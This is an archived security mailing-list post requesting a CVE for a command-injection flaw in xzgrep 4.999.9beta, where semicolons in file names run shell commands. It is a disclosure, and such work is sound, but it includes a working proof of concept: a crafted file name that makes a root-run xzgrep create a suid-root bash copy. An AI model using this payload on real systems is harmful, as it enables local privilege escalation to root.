Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 18 May 2015 13:16:33 +0200
From: Bart Dopheide <>
Subject: CVE request: xzgrep 4.999.9beta arbitrary code execution

I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this 

* Affected versions: 4.999.9beta
* Fixed versions: 5.0.0 and up, 5.2.0 and up
* Description:

xzgrep 4.999.9beta processes filenames containing a semicolon 
incorrectly, which allows for arbitrary code execution as the local user 
running xzgrep.

Demonstration of the vulnerability:
  sh-4.1$ touch /tmp/semi\;colon
  sh-4.1$ xzgrep anystring /tmp/semi\;colon 
  xz: /tmp/semi: No such file or directory
  /usr/bin/xzgrep: line 199: colon: command not found
xzgrep tries extract/grep /tmp/semi and tries to execute "colon", which 
is obviously not wanted.

With a specially crafted filename and three ounces of social 
engineering, a local root exploit is possible. For example:
  sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash" >zzz;sh zzz;rm -f zzz'
  sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+
A suid root /var/tmp/bash should be the result.

I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable.

Bart Dopheide

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ